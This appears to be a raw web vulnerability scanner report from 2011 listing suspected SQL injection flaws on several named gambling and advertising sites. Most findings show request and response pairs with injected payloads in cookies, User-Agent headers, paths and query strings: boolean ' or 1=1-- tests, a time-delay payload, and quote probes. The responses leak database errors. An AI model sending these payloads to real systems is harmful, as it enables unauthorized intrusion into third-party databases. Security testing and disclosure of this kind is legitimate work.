HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.5 Set-Cookie: language=en; expires=Wed, 16-May-2012 11:54:45 GMT; path=/ Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:54:45 GMT; path=/ X-AspNet-Version: 2.0.50727 Set-Cookie: language=en; expires=Wed, 16-May-2012 11:54:45 GMT; path=/ Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:54:45 GMT; path=/ Set-Cookie: lggdnstt=0; path=/ X-Powered-By: ASP.NET Date: Mon, 16 May 2011 11:54:44 GMT Connection: close Content-Length: 102695 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head id="head"> ...[SNIP]... <a href="https://scratch </div> <div class="divLeftMenuPr </div> <div class="divMiddleContent" id="divMiddleContent" > <div id="active_main_promo"> <div class="divMainPromo" id="divMainPromo"></div> </div> <div id="divMain" class="divMain"> <meta name="WT.ti" content="Scratch <meta name="WT.cg_s" content="Startpage <!-- Meta data for AB-testing, remove when tests id done --> <div class="gamesView"> <div id="ctl00_ctl00_cphMain <div id="ctl00_ctl00_cphMain <div id="ctl00_ctl00_cphMain <div id="ctl00_ctl00_cphMain <div id="ctl00_ctl00_cphMain <div id="ctl00_ctl00_cphMain ...[SNIP]... |
Severity: | High |
Confidence: | Tentative |
Host: | https://scratch.betsson |
Path: | /en/Slots/Fantasia |
GET /en/Slots/Fantasia HTTP/1.1 Host: scratch.betsson.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: site=en52785076'%20or%201%3d1-- |
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.5 Set-Cookie: language=en; expires=Wed, 16-May-2012 11:55:03 GMT; path=/ Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:55:03 GMT; path=/ X-AspNet-Version: 2.0.50727 Set-Cookie: language=en; expires=Wed, 16-May-2012 11:55:03 GMT; path=/ Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:55:03 GMT; path=/ Set-Cookie: lggdnstt=0; path=/ X-Powered-By: ASP.NET Date: Mon, 16 May 2011 11:55:03 GMT Connection: close Content-Length: 102695 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head id="head"> ...[SNIP]... <a href="https://scratch </div> <div class="divLeftMenuPr </div> <div class="divMiddleContent" id="divMiddleContent" > <div id="active_main_promo"> <div class="divMainPromo" id="divMainPromo"></div> </div> <div id="divMain" class="divMain"> <meta name="WT.ti" content="Scratch <meta name="WT.cg_s" content="Startpage_Slots" /> <!-- Meta data for AB-testing, remove when tests id done --> <div class="gamesView"> <div id="ctl00_ctl00_cphMain <div id="ctl00_ctl00_cphMain <div id="ctl00_ctl00_cphMain <div id="ctl00_ctl00_cphMain <div id="ctl00_ctl00_cphMain <div id="ctl00_ctl00_cphMain ...[SNIP]... |
GET /en/Slots/Fantasia HTTP/1.1 Host: scratch.betsson.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: site=en52785076'%20or%201%3d2-- |
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.5 Set-Cookie: language=en; expires=Wed, 16-May-2012 11:55:05 GMT; path=/ Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:55:05 GMT; path=/ X-AspNet-Version: 2.0.50727 Set-Cookie: language=en; expires=Wed, 16-May-2012 11:55:05 GMT; path=/ Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:55:05 GMT; path=/ Set-Cookie: lggdnstt=0; path=/ X-Powered-By: ASP.NET Date: Mon, 16 May 2011 11:55:05 GMT Connection: close Content-Length: 102677 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head id="head"> ...[SNIP]... <a href="https://scratch </div> <div class="divLeftMenuPr </div> <div class="divMiddleContent" id="divMiddleContent" > <div id="active_main_promo"> <div class="divMainPromo" id="divMainPromo"></div> </div> <div id="divMain" class="divMain"> <meta name="WT.ti" content="Scratch <meta name="WT.cg_s" content="Startpage_Slots" /> <!-- Meta data for AB-testing, remove when tests id done --> <div class="gamesView"> <div id="ctl00_ctl00_cphMain <div id="ctl00_ctl00_cphMain <div id="ctl00_ctl00_cphMain <div id="ctl00_ctl00_cphMain <div id="ctl00_ctl00_cphMain <div id="ctl00_ctl00_cphMain ...[SNIP]... |
Severity: | High |
Confidence: | Tentative |
Host: | https://scratch.betsson |
Path: | /en/Sports/Bowling |
GET /en/Sports/Bowling HTTP/1.1 Host: scratch.betsson.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)17123380'%20or%201%3d1-- Connection: close Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId |
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.5 Set-Cookie: language=en; expires=Wed, 16-May-2012 11:52:11 GMT; path=/ Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:52:11 GMT; path=/ X-AspNet-Version: 2.0.50727 Set-Cookie: language=en; expires=Wed, 16-May-2012 11:52:11 GMT; path=/ Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:52:11 GMT; path=/ Set-Cookie: lggdnstt=0; path=/ X-Powered-By: ASP.NET Date: Mon, 16 May 2011 11:52:10 GMT Connection: close Content-Length: 102693 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head id="head"> ...[SNIP]... <a href="https://scratch </div> <div class="divLeftMenuPr </div> <div class="divMiddleContent" id="divMiddleContent" > <div id="active_main_promo"> <div class="divMainPromo" id="divMainPromo"></div> </div> <div id="divMain" class="divMain"> <meta name="WT.ti" content="Scratch <meta name="WT.cg_s" content="Startpage_Sports <!-- Meta data for AB-testing, remove when tests id done --> <div class="gamesView"> <div id="ctl00_ctl00_cphMain <div id="ctl00_ctl00_cphMain <div id="ctl00_ctl00_cphMain <div id="ctl00_ctl00_cphMain <div id="ctl00_ctl00_cphMain <div id="ctl00_ctl00_cphMain ...[SNIP]... |
GET /en/Sports/Bowling HTTP/1.1 Host: scratch.betsson.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)17123380'%20or%201%3d2-- Connection: close Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId |
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.5 Set-Cookie: language=en; expires=Wed, 16-May-2012 11:52:12 GMT; path=/ Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:52:12 GMT; path=/ X-AspNet-Version: 2.0.50727 Set-Cookie: language=en; expires=Wed, 16-May-2012 11:52:12 GMT; path=/ Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:52:12 GMT; path=/ Set-Cookie: lggdnstt=0; path=/ X-Powered-By: ASP.NET Date: Mon, 16 May 2011 11:52:12 GMT Connection: close Content-Length: 102706 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head id="head"> ...[SNIP]... <a href="https://scratch </div> <div class="divLeftMenuPr </div> <div class="divMiddleContent" id="divMiddleContent" > <div id="active_main_promo"> <div class="divMainPromo" id="divMainPromo"></div> </div> <div id="divMain" class="divMain"> <meta name="WT.ti" content="Scratch <meta name="WT.cg_s" content="Startpage_Sports <!-- Meta data for AB-testing, remove when tests id done --> <div class="gamesView"> <div id="ctl00_ctl00_cphMain <div id="ctl00_ctl00_cphMain <div id="ctl00_ctl00_cphMain <div id="ctl00_ctl00_cphMain <div id="ctl00_ctl00_cphMain <div id="ctl00_ctl00_cphMain ...[SNIP]... |
Severity: | High |
Confidence: | Tentative |
Host: | https://scratch.betsson |
Path: | /en/Sports/World |
GET /en/Sports/World Host: scratch.betsson.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId Referer: http://www.google.com |
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.5 Set-Cookie: PartnerId=hgjeap65; domain=.betsson.com; expires=Wed, 15-Jun-2011 11:53:34 GMT; path=/ Set-Cookie: language=en; expires=Wed, 16-May-2012 11:53:34 GMT; path=/ Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:53:34 GMT; path=/ X-AspNet-Version: 2.0.50727 Set-Cookie: PartnerId=hgjeap65; domain=.betsson.com; expires=Wed, 15-Jun-2011 11:53:34 GMT; path=/ Set-Cookie: language=en; expires=Wed, 16-May-2012 11:53:34 GMT; path=/ Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:53:34 GMT; path=/ Set-Cookie: lggdnstt=0; path=/ X-Powered-By: ASP.NET Date: Mon, 16 May 2011 11:53:33 GMT Connection: close Content-Length: 102686 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head id="head"> ...[SNIP]... <a href="https://scratch </div> <div class="divLeftMenuPr </div> <div class="divMiddleContent" id="divMiddleContent" > <div id="active_main_promo"> <div class="divMainPromo" id="divMainPromo"></div> </div> <div id="divMain" class="divMain"> <meta name="WT.ti" content="Scratch <meta name="WT.cg_s" content="Startpage_Sports <!-- Meta data for AB-testing, remove when tests id done --> <div class="gamesView"> <div id="ctl00_ctl00_cphMain <div id="ctl00_ctl00_cphMain <div id="ctl00_ctl00_cphMain <div id="ctl00_ctl00_cphMain <div id="ctl00_ctl00_cphMain <div id="ctl00_ctl00_cphMain ...[SNIP]... |
GET /en/Sports/World Host: scratch.betsson.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId Referer: http://www.google.com |
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.5 Set-Cookie: PartnerId=hgjeap65; domain=.betsson.com; expires=Wed, 15-Jun-2011 11:53:35 GMT; path=/ Set-Cookie: language=en; expires=Wed, 16-May-2012 11:53:35 GMT; path=/ Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:53:35 GMT; path=/ X-AspNet-Version: 2.0.50727 Set-Cookie: PartnerId=hgjeap65; domain=.betsson.com; expires=Wed, 15-Jun-2011 11:53:35 GMT; path=/ Set-Cookie: language=en; expires=Wed, 16-May-2012 11:53:35 GMT; path=/ Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:53:35 GMT; path=/ Set-Cookie: lggdnstt=0; path=/ X-Powered-By: ASP.NET Date: Mon, 16 May 2011 11:53:34 GMT Connection: close Content-Length: 102699 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head id="head"> ...[SNIP]... <a href="https://scratch </div> <div class="divLeftMenuPr </div> <div class="divMiddleContent" id="divMiddleContent" > <div id="active_main_promo"> <div class="divMainPromo" id="divMainPromo"></div> </div> <div id="divMain" class="divMain"> <meta name="WT.ti" content="Scratch <meta name="WT.cg_s" content="Startpage_Sports <!-- Meta data for AB-testing, remove when tests id done --> <div class="gamesView"> <div id="ctl00_ctl00_cphMain <div id="ctl00_ctl00_cphMain <div id="ctl00_ctl00_cphMain <div id="ctl00_ctl00_cphMain <div id="ctl00_ctl00_cphMain <div id="ctl00_ctl00_cphMain ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://scratch.co.uk |
Path: | /images/games_ENG.swf |
GET /images'/games_ENG.swf HTTP/1.1 Host: scratch.co.uk Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: affiliate=direct-173 |
HTTP/1.1 404 Not Found Date: Mon, 16 May 2011 12:29:07 GMT Server: Apache X-Powered-By: PHP/5.2.9 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Cache-control: private P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: affiliate=direct-173 Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:29:08 GMT; path=/ Set-Cookie: currency=GBP; expires=Wed, 15-Jun-2011 12:29:08 GMT; path=/ Set-Cookie: neogamesemail=deleted%7E Connection: close Content-Type: text/html Content-Length: 9903 <br /> <b>Warning</b>: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in <b>/home/scratch/public <!DOCTYPE html P ...[SNIP]... |
GET /images''/games_ENG.swf HTTP/1.1 Host: scratch.co.uk Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: affiliate=direct-173 |
HTTP/1.1 404 Not Found Date: Mon, 16 May 2011 12:29:09 GMT Server: Apache X-Powered-By: PHP/5.2.9 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Cache-control: private P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: affiliate=direct-173 Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:29:09 GMT; path=/ Set-Cookie: currency=GBP; expires=Wed, 15-Jun-2011 12:29:09 GMT; path=/ Set-Cookie: neogamesemail=deleted%7E Connection: close Content-Type: text/html Content-Length: 9608 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content-Type" content ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://scratch.co.uk |
Path: | /images/games_ENG.swf |
GET /images/games_ENG.swf' HTTP/1.1 Host: scratch.co.uk Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: affiliate=direct-173 |
HTTP/1.1 404 Not Found Date: Mon, 16 May 2011 12:29:30 GMT Server: Apache X-Powered-By: PHP/5.2.9 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Cache-control: private P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: affiliate=direct-173 Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:29:30 GMT; path=/ Set-Cookie: currency=GBP; expires=Wed, 15-Jun-2011 12:29:30 GMT; path=/ Set-Cookie: neogamesemail=deleted%7E Connection: close Content-Type: text/html Content-Length: 9685 <br /> <b>Warning</b>: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in <b>/home/scratch/public <!DOCTYPE html P ...[SNIP]... |
GET /images/games_ENG.swf'' HTTP/1.1 Host: scratch.co.uk Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: affiliate=direct-173 |
HTTP/1.1 404 Not Found Date: Mon, 16 May 2011 12:29:30 GMT Server: Apache X-Powered-By: PHP/5.2.9 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Cache-control: private P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: affiliate=direct-173 Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:29:31 GMT; path=/ Set-Cookie: currency=GBP; expires=Wed, 15-Jun-2011 12:29:31 GMT; path=/ Set-Cookie: neogamesemail=deleted%7E Connection: close Content-Type: text/html Content-Length: 9501 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content-Type" content ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://scratch.co.uk |
Path: | /resources/style.css |
GET /resources'/style.css HTTP/1.1 Host: scratch.co.uk Proxy-Connection: keep-alive Referer: http://scratch.co.uk/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PHPSESSID=uoi3rve7v6 |
HTTP/1.1 404 Not Found Date: Mon, 16 May 2011 12:29:34 GMT Server: Apache X-Powered-By: PHP/5.2.9 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Cache-control: private P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: affiliate=direct-173 Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:29:34 GMT; path=/ Set-Cookie: currency=GBP; expires=Wed, 15-Jun-2011 12:29:34 GMT; path=/ Set-Cookie: neogamesemail=deleted; expires=Sun, 16-May-2010 12:29:33 GMT; path=/ Content-Type: text/html Content-Length: 9903 <br /> <b>Warning</b>: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in <b>/home/scratch/public <!DOCTYPE html P ...[SNIP]... |
GET /resources''/style.css HTTP/1.1 Host: scratch.co.uk Proxy-Connection: keep-alive Referer: http://scratch.co.uk/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PHPSESSID=uoi3rve7v6 |
HTTP/1.1 404 Not Found Date: Mon, 16 May 2011 12:29:35 GMT Server: Apache X-Powered-By: PHP/5.2.9 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Cache-control: private P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: affiliate=direct-173 Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:29:35 GMT; path=/ Set-Cookie: currency=GBP; expires=Wed, 15-Jun-2011 12:29:35 GMT; path=/ Set-Cookie: neogamesemail=deleted; expires=Sun, 16-May-2010 12:29:34 GMT; path=/ Content-Type: text/html Content-Length: 9501 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content-Type" content ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://scratch.co.uk |
Path: | /resources/style.css |
GET /resources/style.css' HTTP/1.1 Host: scratch.co.uk Proxy-Connection: keep-alive Referer: http://scratch.co.uk/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PHPSESSID=uoi3rve7v6 |
HTTP/1.1 404 Not Found Date: Mon, 16 May 2011 12:30:00 GMT Server: Apache X-Powered-By: PHP/5.2.9 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Cache-control: private P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: affiliate=direct-173 Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:30:01 GMT; path=/ Set-Cookie: currency=GBP; expires=Wed, 15-Jun-2011 12:30:01 GMT; path=/ Set-Cookie: neogamesemail=deleted; expires=Sun, 16-May-2010 12:30:00 GMT; path=/ Content-Type: text/html Content-Length: 9903 <br /> <b>Warning</b>: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in <b>/home/scratch/public <!DOCTYPE html P ...[SNIP]... |
GET /resources/style.css'' HTTP/1.1 Host: scratch.co.uk Proxy-Connection: keep-alive Referer: http://scratch.co.uk/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PHPSESSID=uoi3rve7v6 |
HTTP/1.1 404 Not Found Date: Mon, 16 May 2011 12:30:01 GMT Server: Apache X-Powered-By: PHP/5.2.9 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Cache-control: private P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: affiliate=direct-173 Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:30:03 GMT; path=/ Set-Cookie: currency=GBP; expires=Wed, 15-Jun-2011 12:30:03 GMT; path=/ Set-Cookie: neogamesemail=deleted; expires=Sun, 16-May-2010 12:30:02 GMT; path=/ Content-Type: text/html Content-Length: 9608 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content-Type" content ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://trk.primescra |
Path: | / |
GET /?ac=51waitfor%20delay'0%3a0 Host: trk.primescratchcards.com Proxy-Connection: keep-alive Referer: http://www.primescra User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: pscref=; plstat=0; ARC=130137 |
HTTP/1.1 500 Internal Server Error Date: Mon, 16 May 2011 11:45:45 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 531 Content-Type: text/html Set-Cookie: ASPSESSIONIDQQBCDAQB Cache-control: private <html> <head> <link rel="p3pv1" href="/w3c/p3p.xml">< </head> EXEC sp_pixel_insert 51waitfor delay'0:0:20'-- ,130137 ,5143, 201105160000 <font face="Arial" size=2> <p>Microsoft OLE DB Provid ...[SNIP]... |
Severity: | High |
Confidence: | Tentative |
Host: | http://www.interwetten |
Path: | / |
GET / HTTP/1.1 Host: www.interwetten.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com |
HTTP/1.1 500 Internal Server Error Connection: close Date: Mon, 16 May 2011 12:10:23 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 6798 <html> <head> <title>Syntaxfehler in Zeichenfolge in Abfrageausdruck ''http://www.google.com <style> body {font-family:"Verdana" ...[SNIP]... </b>System.Data.OleDb ...[SNIP]... |
GET / HTTP/1.1 Host: www.interwetten.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:10:23 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 12643 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>Hom ...[SNIP]... |
Severity: | High |
Confidence: | Tentative |
Host: | http://www.neogames.com |
Path: | /our-partners |
GET /our-partners?145542616%20or%201%3d1-- Host: www.neogames.com Proxy-Connection: keep-alive Referer: http://neogames-tech.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Content-Length: 32146 Content-Type: text/html; charset=UTF-8 Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.3.5 X-Pingback: http://www.neogames.com Date: Mon, 16 May 2011 11:39:52 GMT <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head profile ...[SNIP]... </div> <?php// comments_template(); // Get wp-comments.php template ?> <?php// posts_nav_link(' — ', __('« Newer Posts'), __('Older Posts »')); ?> </td></tr> </table> </td> </table> </td></tr> </table> </td></tr> </table> <script type="text/javascript"> var gaJsHost = (("https:" == document.location document.write(unescape(" </script> <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA pageTracker._trackPa } catch(err) {}</script> </body> </html> |
GET /our-partners?145542616%20or%201%3d2-- Host: www.neogames.com Proxy-Connection: keep-alive Referer: http://neogames-tech.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Content-Length: 31988 Content-Type: text/html; charset=UTF-8 Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.3.5 X-Pingback: http://www.neogames.com Date: Mon, 16 May 2011 11:36:59 GMT <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head profile ...[SNIP]... </div> </td></tr> </table> </td> </table> </td></tr> </table> </td></tr> </table> <script type="text/javascript"> var gaJsHost = (("https:" == document.location document.write(unescape(" </script> <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA pageTracker._trackPa } catch(err) {}</script> </body> </html> |
Severity: | High |
Confidence: | Tentative |
Host: | http://www.neogames.com |
Path: | /outbound/article/www |
GET /outbound/article/www Host: www.neogames.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=120915991 |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:15:17 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.3.5 Content-type: text/html Content-Length: 139 <br /> <b>Deprecated</b>: Function split() is deprecated in <b>D:\Neogames\Websites |
GET /outbound/article/www Host: www.neogames.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=120915991 |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:18:04 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.3.5 Content-type: text/html Content-Length: 0 |
Severity: | High |
Confidence: | Tentative |
Host: | http://www.neogames.com |
Path: | /outbound/article/games |
GET /outbound/article/games Host: www.neogames.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=120915991 |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:17:45 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.3.5 Content-type: text/html Content-Length: 0 |
GET /outbound/article/games Host: www.neogames.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=120915991 |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:14:58 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.3.5 Content-type: text/html Content-Length: 139 <br /> <b>Deprecated</b>: Function split() is deprecated in <b>D:\Neogames\Websites |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /adj/N3220.no_url |
GET /adj/N3220.no_url Host: ad.doubleclick.net User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.metacafe.com Cookie: id=c60bd0733000097 |
